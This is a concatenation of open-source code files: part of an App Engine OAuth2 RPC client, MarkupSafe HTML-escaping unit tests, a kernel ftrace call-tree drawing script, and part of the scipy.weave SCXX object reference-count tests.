logger.debug('Sending request to %s headers=%s body=%s',
url, headers,
self.debug_data and payload or payload and 'ELIDED' or '')
try:
response_info, response = self.http.request(url, method, body=payload,
headers=headers)
except client.AccessTokenRefreshError, e:
logger.info('Got access token error', exc_info=1)
response_info = httplib2.Response({'status': 401})
response_info.reason = str(e)
response = ''
status = response_info.status
if status == 200:
return response
logger.debug('Got http error %s, this is try #%s',
response_info.status, tries)
if status == 401:
NeedAuth()
continue
elif status >= 500 and status < 600:
continue
elif status == 302:
loc = response_info.get('location')
logger.debug('Got 302 redirect. Location: %s', loc)
if (loc.startswith('https://www.google.com/accounts/ServiceLogin') or
re.match(r'https://www.google.com/a/[a-z0-9.-]+/ServiceLogin',
loc)):
NeedAuth()
continue
elif loc.startswith('http://%s/_ah/login' % (self.host,)):
RaiseHttpError(url, response_info, response,
'dev_appserver login not supported')
else:
RaiseHttpError(url, response_info, response,
'Unexpected redirect to %s' % loc)
else:
logger.debug('Unexpected results: %s', response_info)
RaiseHttpError(url, response_info, response,
'Unexpected HTTP status %s' % status)
logging.info('Too many retries for url %s', url)
RaiseHttpError(url, response_info, response)
class NoStorage(client.Storage):
"""A no-op implementation of storage."""
def locked_get(self):
return None
def locked_put(self, credentials):
pass
class HttpRpcServerOauth2(HttpRpcServerHttpLib2):
"""A variant of HttpRpcServer which uses oauth2.
This variant is specifically meant for interactive command line usage,
as it will attempt to open a browser and ask the user to enter
information from the resulting web page.
"""
def __init__(self, host, refresh_token, user_agent, source,
host_override=None, extra_headers=None, save_cookies=False,
auth_tries=None, account_type=None, debug_data=True, secure=True,
rpc_tries=3):
"""Creates a new HttpRpcServerOauth2.
Args:
host: The host to send requests to.
refresh_token: A string refresh token to use, or None to guide the user
through the auth flow. (Replaces auth_function on parent class.)
user_agent: The user-agent string to send to the server. Specify None to
omit the user-agent header.
source: Tuple, (client_id, client_secret, scope), for oauth credentials.
host_override: The host header to send to the server (defaults to host).
extra_headers: A dict of extra headers to append to every request. Values
supplied here will override other default headers that are supplied.
save_cookies: If the refresh token should be saved.
auth_tries: The number of times to attempt auth_function before failing.
account_type: Ignored.
debug_data: Whether debugging output should include data contents.
secure: If the requests sent using Send should be sent over HTTPS.
rpc_tries: The number of rpc retries upon http server error (i.e.
Response code >= 500 and < 600) before failing.
"""
super(HttpRpcServerOauth2, self).__init__(
host, None, user_agent, None, host_override=host_override,
extra_headers=extra_headers, auth_tries=auth_tries,
debug_data=debug_data, secure=secure, rpc_tries=rpc_tries)
if save_cookies:
self.storage = oauth2client_file.Storage(
os.path.expanduser('~/.appcfg_oauth2_tokens'))
else:
self.storage = NoStorage()
if not isinstance(source, tuple) or len(source) != 3:
raise TypeError('Source must be tuple (client_id, client_secret, scope).')
self.client_id = source[0]
self.client_secret = source[1]
self.scope = source[2]
self.refresh_token = refresh_token
if refresh_token:
self.credentials = client.OAuth2Credentials(
None,
self.client_id,
self.client_secret,
refresh_token,
None,
('https://%s/o/oauth2/token' %
os.getenv('APPENGINE_AUTH_SERVER', 'accounts.google.com')),
self.user_agent)
else:
self.credentials = self.storage.get()
def _Authenticate(self, http, needs_auth):
"""Pre or Re-auth stuff...
This will attempt to avoid making any OAuth related HTTP connections or
user interactions unless it's needed.
Args:
http: An 'Http' object from httplib2.
needs_auth: If the user has already tried to contact the server.
If they have, it's OK to prompt them. If not, we should not be asking
them for auth info--it's possible it'll suceed w/o auth, but if we have
some credentials we'll use them anyway.
Raises:
AuthPermanentFail: The user has requested non-interactive auth but
the token is invalid.
"""
if needs_auth and (not self.credentials or self.credentials.invalid):
if self.refresh_token:
logger.debug('_Authenticate and skipping auth because user explicitly '
'supplied a refresh token.')
raise AuthPermanentFail('Refresh token is invalid.')
logger.debug('_Authenticate and requesting auth')
flow = client.OAuth2WebServerFlow(
client_id=self.client_id,
client_secret=self.client_secret,
scope=self.scope,
user_agent=self.user_agent)
self.credentials = tools.run(flow, self.storage)
if self.credentials and not self.credentials.invalid:
if not self.credentials.access_token_expired or needs_auth:
logger.debug('_Authenticate configuring auth; needs_auth=%s',
needs_auth)
self.credentials.authorize(http)
return
logger.debug('_Authenticate skipped auth; needs_auth=%s', needs_auth)
| bsd-3-clause |
dkindel/ece5574team7RESTAPI | lib/markupsafe/tests.py | 674 | 6107 | # -*- coding: utf-8 -*-
import gc
import sys
import unittest
from markupsafe import Markup, escape, escape_silent
from markupsafe._compat import text_type
class MarkupTestCase(unittest.TestCase):
def test_adding(self):
# adding two strings should escape the unsafe one
unsafe = '<script type="application/x-some-script">alert("foo");</script>'
safe = Markup('<em>username</em>')
assert unsafe + safe == text_type(escape(unsafe)) + text_type(safe)
def test_string_interpolation(self):
# string interpolations are safe to use too
assert Markup('<em>%s</em>') % '<bad user>' == \
'<em><bad user></em>'
assert Markup('<em>%(username)s</em>') % {
'username': '<bad user>'
} == '<em><bad user></em>'
assert Markup('%i') % 3.14 == '3'
assert Markup('%.2f') % 3.14 == '3.14'
def test_type_behavior(self):
# an escaped object is markup too
assert type(Markup('foo') + 'bar') is Markup
# and it implements __html__ by returning itself
x = Markup("foo")
assert x.__html__() is x
def test_html_interop(self):
# it also knows how to treat __html__ objects
class Foo(object):
def __html__(self):
return '<em>awesome</em>'
def __unicode__(self):
return 'awesome'
__str__ = __unicode__
assert Markup(Foo()) == '<em>awesome</em>'
assert Markup('<strong>%s</strong>') % Foo() == \
'<strong><em>awesome</em></strong>'
def test_tuple_interpol(self):
self.assertEqual(Markup('<em>%s:%s</em>') % (
'<foo>',
'<bar>',
), Markup(u'<em><foo>:<bar></em>'))
def test_dict_interpol(self):
self.assertEqual(Markup('<em>%(foo)s</em>') % {
'foo': '<foo>',
}, Markup(u'<em><foo></em>'))
self.assertEqual(Markup('<em>%(foo)s:%(bar)s</em>') % {
'foo': '<foo>',
'bar': '<bar>',
}, Markup(u'<em><foo>:<bar></em>'))
def test_escaping(self):
# escaping and unescaping
assert escape('"<>&\'') == '"<>&''
assert Markup("<em>Foo & Bar</em>").striptags() == "Foo & Bar"
assert Markup("<test>").unescape() == "<test>"
def test_formatting(self):
for actual, expected in (
(Markup('%i') % 3.14, '3'),
(Markup('%.2f') % 3.14159, '3.14'),
(Markup('%s %s %s') % ('<', 123, '>'), '< 123 >'),
(Markup('<em>{awesome}</em>').format(awesome='<awesome>'),
'<em><awesome></em>'),
(Markup('{0[1][bar]}').format([0, {'bar': '<bar/>'}]),
'<bar/>'),
(Markup('{0[1][bar]}').format([0, {'bar': Markup('<bar/>')}]),
'<bar/>')):
assert actual == expected, "%r should be %r!" % (actual, expected)
# This is new in 2.7
if sys.version_info >= (2, 7):
def test_formatting_empty(self):
formatted = Markup('{}').format(0)
assert formatted == Markup('0')
def test_custom_formatting(self):
class HasHTMLOnly(object):
def __html__(self):
return Markup('<foo>')
class HasHTMLAndFormat(object):
def __html__(self):
return Markup('<foo>')
def __html_format__(self, spec):
return Markup('<FORMAT>')
assert Markup('{0}').format(HasHTMLOnly()) == Markup('<foo>')
assert Markup('{0}').format(HasHTMLAndFormat()) == Markup('<FORMAT>')
def test_complex_custom_formatting(self):
class User(object):
def __init__(self, id, username):
self.id = id
self.username = username
def __html_format__(self, format_spec):
if format_spec == 'link':
return Markup('<a href="/user/{0}">{1}</a>').format(
self.id,
self.__html__(),
)
elif format_spec:
raise ValueError('Invalid format spec')
return self.__html__()
def __html__(self):
return Markup('<span class=user>{0}</span>').format(self.username)
user = User(1, 'foo')
assert Markup('<p>User: {0:link}').format(user) == \
Markup('<p>User: <a href="/user/1"><span class=user>foo</span></a>')
def test_all_set(self):
import markupsafe as markup
for item in markup.__all__:
getattr(markup, item)
def test_escape_silent(self):
assert escape_silent(None) == Markup()
assert escape(None) == Markup(None)
assert escape_silent('<foo>') == Markup(u'<foo>')
def test_splitting(self):
self.assertEqual(Markup('a b').split(), [
Markup('a'),
Markup('b')
])
self.assertEqual(Markup('a b').rsplit(), [
Markup('a'),
Markup('b')
])
self.assertEqual(Markup('a\nb').splitlines(), [
Markup('a'),
Markup('b')
])
def test_mul(self):
self.assertEqual(Markup('a') * 3, Markup('aaa'))
class MarkupLeakTestCase(unittest.TestCase):
def test_markup_leaks(self):
counts = set()
for count in range(20):
for item in range(1000):
escape("foo")
escape("<foo>")
escape(u"foo")
escape(u"<foo>")
counts.add(len(gc.get_objects()))
assert len(counts) == 1, 'ouch, c extension seems to leak objects'
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(MarkupTestCase))
# this test only tests the c extension
if not hasattr(escape, 'func_code'):
suite.addTest(unittest.makeSuite(MarkupLeakTestCase))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='suite')
# vim:sts=4:sw=4:et:
| apache-2.0 |
Droid-Concepts/kernel_samsung_jf | scripts/tracing/draw_functrace.py | 14676 | 3560 | #!/usr/bin/python
"""
Copyright 2008 (c) Frederic Weisbecker <fweisbec@gmail.com>
Licensed under the terms of the GNU GPL License version 2
This script parses a trace provided by the function tracer in
kernel/trace/trace_functions.c
The resulted trace is processed into a tree to produce a more human
view of the call stack by drawing textual but hierarchical tree of
calls. Only the functions's names and the the call time are provided.
Usage:
Be sure that you have CONFIG_FUNCTION_TRACER
# mount -t debugfs nodev /sys/kernel/debug
# echo function > /sys/kernel/debug/tracing/current_tracer
$ cat /sys/kernel/debug/tracing/trace_pipe > ~/raw_trace_func
Wait some times but not too much, the script is a bit slow.
Break the pipe (Ctrl + Z)
$ scripts/draw_functrace.py < raw_trace_func > draw_functrace
Then you have your drawn trace in draw_functrace
"""
import sys, re
class CallTree:
""" This class provides a tree representation of the functions
call stack. If a function has no parent in the kernel (interrupt,
syscall, kernel thread...) then it is attached to a virtual parent
called ROOT.
"""
ROOT = None
def __init__(self, func, time = None, parent = None):
self._func = func
self._time = time
if parent is None:
self._parent = CallTree.ROOT
else:
self._parent = parent
self._children = []
def calls(self, func, calltime):
""" If a function calls another one, call this method to insert it
into the tree at the appropriate place.
@return: A reference to the newly created child node.
"""
child = CallTree(func, calltime, self)
self._children.append(child)
return child
def getParent(self, func):
""" Retrieve the last parent of the current node that
has the name given by func. If this function is not
on a parent, then create it as new child of root
@return: A reference to the parent.
"""
tree = self
while tree != CallTree.ROOT and tree._func != func:
tree = tree._parent
if tree == CallTree.ROOT:
child = CallTree.ROOT.calls(func, None)
return child
return tree
def __repr__(self):
return self.__toString("", True)
def __toString(self, branch, lastChild):
if self._time is not None:
s = "%s----%s (%s)\n" % (branch, self._func, self._time)
else:
s = "%s----%s\n" % (branch, self._func)
i = 0
if lastChild:
branch = branch[:-1] + " "
while i < len(self._children):
if i != len(self._children) - 1:
s += "%s" % self._children[i].__toString(branch +\
" |", False)
else:
s += "%s" % self._children[i].__toString(branch +\
" |", True)
i += 1
return s
class BrokenLineException(Exception):
"""If the last line is not complete because of the pipe breakage,
we want to stop the processing and ignore this line.
"""
pass
class CommentLineException(Exception):
""" If the line is a comment (as in the beginning of the trace file),
just ignore it.
"""
pass
def parseLine(line):
line = line.strip()
if line.startswith("#"):
raise CommentLineException
m = re.match("[^]]+?\\] +([0-9.]+): (\\w+) <-(\\w+)", line)
if m is None:
raise BrokenLineException
return (m.group(1), m.group(2), m.group(3))
def main():
CallTree.ROOT = CallTree("Root (Nowhere)", None, None)
tree = CallTree.ROOT
for line in sys.stdin:
try:
calltime, callee, caller = parseLine(line)
except BrokenLineException:
break
except CommentLineException:
continue
tree = tree.getParent(caller)
tree = tree.calls(callee, calltime)
print CallTree.ROOT
if __name__ == "__main__":
main()
| gpl-2.0 |
lukauskas/scipy | scipy/weave/tests/test_scxx_object.py | 91 | 27994 | """ Test refcounting and behavior of SCXX.
"""
from __future__ import absolute_import, print_function
import sys
from UserList import UserList
from numpy.testing import (TestCase, assert_equal, assert_, assert_raises,
run_module_suite)
from scipy.weave import inline_tools
from weave_test_utils import debug_print, dec
class TestObjectConstruct(TestCase):
#------------------------------------------------------------------------
# Check that construction from basic types is allowed and have correct
# reference counts
#------------------------------------------------------------------------
@dec.slow
def test_int(self):
# strange int value used to try and make sure refcount is 2.
code = """
py::object val = 1001;
return_val = val;
"""
res = inline_tools.inline(code)
assert_equal(sys.getrefcount(res),2)
assert_equal(res,1001)
@dec.slow
def test_float(self):
code = """
py::object val = (float)1.0;
return_val = val;
"""
res = inline_tools.inline(code)
assert_equal(sys.getrefcount(res),2)
assert_equal(res,1.0)
@dec.slow
def test_double(self):
code = """
py::object val = 1.0;
return_val = val;
"""
res = inline_tools.inline(code)
assert_equal(sys.getrefcount(res),2)
assert_equal(res,1.0)
@dec.slow
def test_complex(self):
code = """
std::complex<double> num = std::complex<double>(1.0,1.0);
py::object val = num;
return_val = val;
"""
res = inline_tools.inline(code)
assert_equal(sys.getrefcount(res),2)
assert_equal(res,1.0+1.0j)
@dec.slow
def test_string(self):
code = """
py::object val = "hello";
return_val = val;
"""
res = inline_tools.inline(code)
assert_equal(sys.getrefcount(res),2)
assert_equal(res,"hello")
@dec.slow
def test_std_string(self):
code = """
std::string s = std::string("hello");
py::object val = s;
return_val = val;
"""
res = inline_tools.inline(code)
assert_equal(sys.getrefcount(res),2)
assert_equal(res,"hello")
class TestObjectPrint(TestCase):
#------------------------------------------------------------------------
# Check the object print protocol.
#------------------------------------------------------------------------
@dec.slow
def test_stringio(self):
import cStringIO
file_imposter = cStringIO.StringIO()
code = """
py::object val = "how now brown cow";
val.print(file_imposter);
"""
res = inline_tools.inline(code,['file_imposter'])
debug_print(file_imposter.getvalue())
assert_equal(file_imposter.getvalue(),"'how now brown cow'")
## @dec.slow
## def test_failure(self):
## code = """
## FILE* file = 0;
## py::object val = "how now brown cow";
## val.print(file);
## """
## try:
## res = inline_tools.inline(code)
## except:
## # error was supposed to occur.
## pass
class TestObjectCast(TestCase):
@dec.slow
def test_int_cast(self):
code = """
py::object val = 1;
int raw_val __attribute__ ((unused)) = val;
"""
inline_tools.inline(code)
@dec.slow
def test_double_cast(self):
code = """
py::object val = 1.0;
double raw_val __attribute__ ((unused)) = val;
"""
inline_tools.inline(code)
@dec.slow
def test_float_cast(self):
code = """
py::object val = 1.0;
float raw_val __attribute__ ((unused)) = val;
"""
inline_tools.inline(code)
@dec.slow
def test_complex_cast(self):
code = """
std::complex<double> num = std::complex<double>(1.0, 1.0);
py::object val = num;
std::complex<double> raw_val __attribute__ ((unused)) = val;
"""
inline_tools.inline(code)
@dec.slow
def test_string_cast(self):
code = """
py::object val = "hello";
std::string raw_val __attribute__ ((unused)) = val;
"""
inline_tools.inline(code)
# test class used for testing python class access from C++.
class Foo:
def bar(self):
return "bar results"
def bar2(self,val1,val2):
return val1, val2
def bar3(self,val1,val2,val3=1):
return val1, val2, val3
# class StrObj:
# def __str__(self):
# return "b"
class TestObjectHasattr(TestCase):
@dec.slow
def test_string(self):
a = Foo()
a.b = 12345
code = """
return_val = a.hasattr("b");
"""
res = inline_tools.inline(code,['a'])
assert_(res)
@dec.slow
def test_std_string(self):
a = Foo()
a.b = 12345
attr_name = "b"
code = """
return_val = a.hasattr(attr_name);
"""
res = inline_tools.inline(code,['a','attr_name'])
assert_(res)
@dec.slow
def test_string_fail(self):
a = Foo()
a.b = 12345
code = """
return_val = a.hasattr("c");
"""
res = inline_tools.inline(code,['a'])
assert_(not res)
@dec.slow
def test_inline(self):
#TODO: THIS NEEDS TO MOVE TO THE INLINE TEST SUITE
a = Foo()
a.b = 12345
code = """
throw_error(PyExc_AttributeError,"bummer");
"""
try:
before = sys.getrefcount(a)
inline_tools.inline(code,['a'])
except AttributeError:
after = sys.getrefcount(a)
try:
inline_tools.inline(code,['a'])
except:
after2 = sys.getrefcount(a)
debug_print("after and after2 should be equal in the following")
debug_print('before, after, after2:', before, after, after2)
@dec.slow
def test_func(self):
a = Foo()
a.b = 12345
code = """
return_val = a.hasattr("bar");
"""
res = inline_tools.inline(code,['a'])
assert_(res)
class TestObjectAttr(TestCase):
def generic_attr(self,code,args=['a']):
a = Foo()
a.b = 12345
before = sys.getrefcount(a.b)
res = inline_tools.inline(code,args)
assert_equal(res,a.b)
del res
after = sys.getrefcount(a.b)
assert_equal(after,before)
@dec.slow
def test_char(self):
self.generic_attr('return_val = a.attr("b");')
@dec.slow
def test_char_fail(self):
assert_raises(AttributeError, self.generic_attr, 'return_val = a.attr("c");')
@dec.slow
def test_string(self):
self.generic_attr('return_val = a.attr(std::string("b"));')
@dec.slow
def test_string_fail(self):
assert_raises(AttributeError, self.generic_attr, 'return_val = a.attr(std::string("c"));')
@dec.slow
def test_obj(self):
code = """
py::object name = "b";
return_val = a.attr(name);
"""
self.generic_attr(code,['a'])
@dec.slow
def test_obj_fail(self):
code = """
py::object name = "c";
return_val = a.attr(name);
"""
assert_raises(AttributeError, self.generic_attr, code, ['a'])
@dec.slow
def test_attr_call(self):
a = Foo()
res = inline_tools.inline('return_val = a.attr("bar").call();',['a'])
first = sys.getrefcount(res)
del res
res = inline_tools.inline('return_val = a.attr("bar").call();',['a'])
second = sys.getrefcount(res)
assert_equal(res,"bar results")
assert_equal(first,second)
class TestObjectSetAttr(TestCase):
def generic_existing(self, code, desired):
args = ['a']
a = Foo()
a.b = 12345
inline_tools.inline(code,args)
assert_equal(a.b,desired)
def generic_new(self, code, desired):
args = ['a']
a = Foo()
inline_tools.inline(code,args)
assert_equal(a.b,desired)
@dec.slow
def test_existing_char(self):
self.generic_existing('a.set_attr("b","hello");',"hello")
@dec.slow
def test_new_char(self):
self.generic_new('a.set_attr("b","hello");',"hello")
@dec.slow
def test_existing_string(self):
self.generic_existing('a.set_attr("b",std::string("hello"));',"hello")
@dec.slow
def test_new_string(self):
self.generic_new('a.set_attr("b",std::string("hello"));',"hello")
@dec.slow
def test_existing_object(self):
code = """
py::object obj = "hello";
a.set_attr("b",obj);
"""
self.generic_existing(code,"hello")
@dec.slow
def test_new_object(self):
code = """
py::object obj = "hello";
a.set_attr("b",obj);
"""
self.generic_new(code,"hello")
@dec.slow
def test_new_fail(self):
try:
code = """
py::object obj = 1;
a.set_attr(obj,"hello");
"""
self.generic_new(code,"hello")
except:
pass
@dec.slow
def test_existing_int(self):
self.generic_existing('a.set_attr("b",1);',1)
@dec.slow
def test_existing_double(self):
self.generic_existing('a.set_attr("b",1.0);',1.0)
@dec.slow
def test_existing_complex(self):
code = """
std::complex<double> obj = std::complex<double>(1,1);
a.set_attr("b",obj);
"""
self.generic_existing(code,1+1j)
@dec.slow
def test_existing_char1(self):
self.generic_existing('a.set_attr("b","hello");',"hello")
@dec.slow
def test_existing_string1(self):
code = """
std::string obj = std::string("hello");
a.set_attr("b",obj);
"""
self.generic_existing(code,"hello")
class TestObjectDel(TestCase):
def generic(self, code):
args = ['a']
a = Foo()
a.b = 12345
inline_tools.inline(code,args)
assert_(not hasattr(a,"b"))
@dec.slow
def test_char(self):
self.generic('a.del("b");')
@dec.slow
def test_string(self):
code = """
std::string name = std::string("b");
a.del(name);
"""
self.generic(code)
@dec.slow
def test_object(self):
code = """
py::object name = py::object("b");
a.del(name);
"""
self.generic(code)
class TestObjectCmp(TestCase):
@dec.slow
def test_equal(self):
a,b = 1,1
res = inline_tools.inline('return_val = (a == b);',['a','b'])
assert_equal(res,(a == b))
@dec.slow
def test_equal_objects(self):
class Foo:
def __init__(self,x):
self.x = x
def __cmp__(self,other):
return cmp(self.x,other.x)
a,b = Foo(1),Foo(2)
res = inline_tools.inline('return_val = (a == b);',['a','b'])
assert_equal(res,(a == b))
@dec.slow
def test_lt(self):
a,b = 1,2
res = inline_tools.inline('return_val = (a < b);',['a','b'])
assert_equal(res,(a < b))
@dec.slow
def test_gt(self):
a,b = 1,2
res = inline_tools.inline('return_val = (a > b);',['a','b'])
assert_equal(res,(a > b))
@dec.slow
def test_gte(self):
a,b = 1,2
res = inline_tools.inline('return_val = (a >= b);',['a','b'])
assert_equal(res,(a >= b))
@dec.slow
def test_lte(self):
a,b = 1,2
res = inline_tools.inline('return_val = (a <= b);',['a','b'])
assert_equal(res,(a <= b))
@dec.slow
def test_not_equal(self):
a,b = 1,2
res = inline_tools.inline('return_val = (a != b);',['a','b'])
assert_equal(res,(a != b))
@dec.slow
def test_int(self):
a = 1
res = inline_tools.inline('return_val = (a == 1);',['a'])
assert_equal(res,(a == 1))
@dec.slow
def test_int2(self):
a = 1
res = inline_tools.inline('return_val = (1 == a);',['a'])
assert_equal(res,(a == 1))
@dec.slow
def test_unsigned_long(self):
a = 1
res = inline_tools.inline('return_val = (a == (unsigned long)1);',['a'])
assert_equal(res,(a == 1))
@dec.slow
def test_double(self):
a = 1
res = inline_tools.inline('return_val = (a == 1.0);',['a'])
assert_equal(res,(a == 1.0))
@dec.slow
def test_char(self):
a = "hello"
res = inline_tools.inline('return_val = (a == "hello");',['a'])
assert_equal(res,(a == "hello"))
@dec.slow
def test_std_string(self):
a = "hello"
code = """
std::string hello = std::string("hello");
return_val = (a == hello);
"""
res = inline_tools.inline(code,['a'])
assert_equal(res,(a == "hello"))
class TestObjectRepr(TestCase):
@dec.slow
def test_repr(self):
class Foo:
def __str__(self):
return "str return"
def __repr__(self):
return "repr return"
a = Foo()
res = inline_tools.inline('return_val = a.repr();',['a'])
first = sys.getrefcount(res)
del res
res = inline_tools.inline('return_val = a.repr();',['a'])
second = sys.getrefcount(res)
assert_equal(first,second)
assert_equal(res,"repr return")
class TestObjectStr(TestCase):
@dec.slow
def test_str(self):
class Foo:
def __str__(self):
return "str return"
def __repr__(self):
return "repr return"
a = Foo()
res = inline_tools.inline('return_val = a.str();',['a'])
first = sys.getrefcount(res)
del res
res = inline_tools.inline('return_val = a.str();',['a'])
second = sys.getrefcount(res)
assert_equal(first,second)
assert_equal(res,"str return")
class TestObjectUnicode(TestCase):
# This ain't going to win awards for test of the year...
@dec.slow
def test_unicode(self):
class Foo:
def __repr__(self):
return "repr return"
def __str__(self):
return "unicode"
a = Foo()
res = inline_tools.inline('return_val = a.unicode();',['a'])
first = sys.getrefcount(res)
del res
res = inline_tools.inline('return_val = a.unicode();',['a'])
second = sys.getrefcount(res)
assert_equal(first,second)
assert_equal(res,"unicode")
class TestObjectIsCallable(TestCase):
@dec.slow
def test_true(self):
class Foo:
def __call__(self):
return 0
a = Foo()
res = inline_tools.inline('return_val = a.is_callable();',['a'])
assert_(res)
@dec.slow
def test_false(self):
class Foo:
pass
a = Foo()
res = inline_tools.inline('return_val = a.is_callable();',['a'])
assert_(not res)
class TestObjectCall(TestCase):
@dec.slow
def test_noargs(self):
def Foo():
return (1,2,3)
res = inline_tools.inline('return_val = Foo.call();',['Foo'])
assert_equal(res,(1,2,3))
assert_equal(sys.getrefcount(res),3) # should be 2?
@dec.slow
def test_args(self):
def Foo(val1,val2):
return (val1,val2)
code = """
py::tuple args(2);
args[0] = 1;
args[1] = "hello";
return_val = Foo.call(args);
"""
res = inline_tools.inline(code,['Foo'])
assert_equal(res,(1,"hello"))
assert_equal(sys.getrefcount(res),2)
@dec.slow
def test_args_kw(self):
def Foo(val1,val2,val3=1):
return (val1,val2,val3)
code = """
py::tuple args(2);
args[0] = 1;
args[1] = "hello";
py::dict kw;
kw["val3"] = 3;
return_val = Foo.call(args,kw);
"""
res = inline_tools.inline(code,['Foo'])
assert_equal(res,(1,"hello",3))
assert_equal(sys.getrefcount(res),2)
@dec.slow
def test_noargs_with_args_not_instantiated(self):
# calling a function that doesn't take args with args should fail.
# Note: difference between this test add ``test_noargs_with_args``
# below is that here Foo is not instantiated.
def Foo():
return "blah"
code = """
py::tuple args(2);
args[0] = 1;
args[1] = "hello";
return_val = Foo.call(args);
"""
try:
first = sys.getrefcount(Foo)
inline_tools.inline(code,['Foo'])
except TypeError:
second = sys.getrefcount(Foo)
try:
inline_tools.inline(code,['Foo'])
except TypeError:
third = sys.getrefcount(Foo)
# first should == second, but the weird refcount error
assert_equal(second,third)
class TestObjectMcall(TestCase):
@dec.slow
def test_noargs(self):
a = Foo()
res = inline_tools.inline('return_val = a.mcall("bar");',['a'])
assert_equal(res,"bar results")
first = sys.getrefcount(res)
del res
res = inline_tools.inline('return_val = a.mcall("bar");',['a'])
assert_equal(res,"bar results")
second = sys.getrefcount(res)
assert_equal(first,second)
@dec.slow
def test_args(self):
a = Foo()
code = """
py::tuple args(2);
args[0] = 1;
args[1] = "hello";
return_val = a.mcall("bar2",args);
"""
res = inline_tools.inline(code,['a'])
assert_equal(res,(1,"hello"))
assert_equal(sys.getrefcount(res),2)
@dec.slow
def test_args_kw(self):
a = Foo()
code = """
py::tuple args(2);
args[0] = 1;
args[1] = "hello";
py::dict kw;
kw["val3"] = 3;
return_val = a.mcall("bar3",args,kw);
"""
res = inline_tools.inline(code,['a'])
assert_equal(res,(1,"hello",3))
assert_equal(sys.getrefcount(res),2)
@dec.slow
def test_std_noargs(self):
a = Foo()
method = "bar"
res = inline_tools.inline('return_val = a.mcall(method);',['a','method'])
assert_equal(res,"bar results")
first = sys.getrefcount(res)
del res
res = inline_tools.inline('return_val = a.mcall(method);',['a','method'])
assert_equal(res,"bar results")
second = sys.getrefcount(res)
assert_equal(first,second)
@dec.slow
def test_std_args(self):
a = Foo()
method = "bar2"
code = """
py::tuple args(2);
args[0] = 1;
args[1] = "hello";
return_val = a.mcall(method,args);
"""
res = inline_tools.inline(code,['a','method'])
assert_equal(res,(1,"hello"))
assert_equal(sys.getrefcount(res),2)
@dec.slow
def test_std_args_kw(self):
a = Foo()
method = "bar3"
code = """
py::tuple args(2);
args[0] = 1;
args[1] = "hello";
py::dict kw;
kw["val3"] = 3;
return_val = a.mcall(method,args,kw);
"""
res = inline_tools.inline(code,['a','method'])
assert_equal(res,(1,"hello",3))
assert_equal(sys.getrefcount(res),2)
@dec.slow
def test_noargs_with_args(self):
# calling a function that doesn't take args with args should fail.
a = Foo()
code = """
py::tuple args(2);
args[0] = 1;
args[1] = "hello";
return_val = a.mcall("bar",args);
"""
try:
first = sys.getrefcount(a)
inline_tools.inline(code,['a'])
except TypeError:
second = sys.getrefcount(a)
try:
inline_tools.inline(code,['a'])
except TypeError:
third = sys.getrefcount(a)
# first should == second, but the weird refcount error
assert_equal(second,third)
class TestObjectHash(TestCase):
@dec.slow
def test_hash(self):
class Foo:
def __hash__(self):
return 123
a = Foo()
res = inline_tools.inline('return_val = a.hash(); ',['a'])
debug_print('hash:', res)
assert_equal(res,123)
class TestObjectIsTrue(TestCase):
@dec.slow
def test_true(self):
class Foo:
pass
a = Foo()
res = inline_tools.inline('return_val = a.is_true();',['a'])
assert_equal(res,1)
@dec.slow
def test_false(self):
a = None
res = inline_tools.inline('return_val = a.is_true();',['a'])
assert_equal(res,0)
class TestObjectType(TestCase):
@dec.slow
def test_type(self):
class Foo:
pass
a = Foo()
res = inline_tools.inline('return_val = a.type();',['a'])
assert_equal(res,type(a))
class TestObjectSize(TestCase):
@dec.slow
def test_size(self):
class Foo:
def __len__(self):
return 10
a = Foo()
res = inline_tools.inline('return_val = a.size();',['a'])
assert_equal(res,len(a))
@dec.slow
def test_len(self):
class Foo:
def __len__(self):
return 10
a = Foo()
res = inline_tools.inline('return_val = a.len();',['a'])
assert_equal(res,len(a))
@dec.slow
def test_length(self):
class Foo:
def __len__(self):
return 10
a = Foo()
res = inline_tools.inline('return_val = a.length();',['a'])
assert_equal(res,len(a))
class TestObjectSetItemOpIndex(TestCase):
@dec.slow
def test_list_refcount(self):
a = UserList([1,2,3])
# temporary refcount fix until I understand why it incs by one.
inline_tools.inline("a[1] = 1234;",['a'])
before1 = sys.getrefcount(a)
after1 = sys.getrefcount(a)
assert_equal(after1,before1)
@dec.slow
def test_set_int(self):
a = UserList([1,2,3])
inline_tools.inline("a[1] = 1234;",['a'])
assert_equal(sys.getrefcount(a[1]),2)
assert_equal(a[1],1234)
@dec.slow
def test_set_double(self):
a = UserList([1,2,3])
inline_tools.inline("a[1] = 123.0;",['a'])
assert_equal(sys.getrefcount(a[1]),2)
assert_equal(a[1],123.0)
@dec.slow
def test_set_char(self):
a = UserList([1,2,3])
inline_tools.inline('a[1] = "bubba";',['a'])
assert_equal(sys.getrefcount(a[1]),2)
assert_equal(a[1],'bubba')
@dec.slow
def test_set_string1(self):
a = UserList([1,2,3])
inline_tools.inline('a[1] = std::string("sissy");',['a'])
assert_equal(sys.getrefcount(a[1]),2)
assert_equal(a[1],'sissy')
@dec.slow
def test_set_string2(self):
a = UserList([1,2,3])
inline_tools.inline('a[1] = std::complex<double>(1,1);',['a'])
assert_equal(sys.getrefcount(a[1]),2)
assert_equal(a[1],1+1j)
from UserDict import UserDict
class TestObjectSetItemOpKey(TestCase):
@dec.slow
def test_key_refcount(self):
a = UserDict()
code = """
py::object one = 1;
py::object two = 2;
py::tuple ref_counts(3);
py::tuple obj_counts(3);
py::tuple val_counts(3);
py::tuple key_counts(3);
obj_counts[0] = a.refcount();
key_counts[0] = one.refcount();
val_counts[0] = two.refcount();
a[1] = 2;
obj_counts[1] = a.refcount();
key_counts[1] = one.refcount();
val_counts[1] = two.refcount();
a[1] = 2;
obj_counts[2] = a.refcount();
key_counts[2] = one.refcount();
val_counts[2] = two.refcount();
ref_counts[0] = obj_counts;
ref_counts[1] = key_counts;
ref_counts[2] = val_counts;
return_val = ref_counts;
"""
obj,key,val = inline_tools.inline(code,['a'])
assert_equal(obj[0],obj[1])
assert_equal(obj[1],obj[2])
assert_equal(key[0] + 1, key[1])
assert_equal(key[1], key[2])
assert_equal(val[0] + 1, val[1])
assert_equal(val[1], val[2])
@dec.slow
def test_set_double_exists(self):
a = UserDict()
key = 10.0
a[key] = 100.0
inline_tools.inline('a[key] = 123.0;',['a','key'])
first = sys.getrefcount(key)
inline_tools.inline('a[key] = 123.0;',['a','key'])
second = sys.getrefcount(key)
assert_equal(first,second)
# !! I think the following should be 3
assert_equal(sys.getrefcount(key),5)
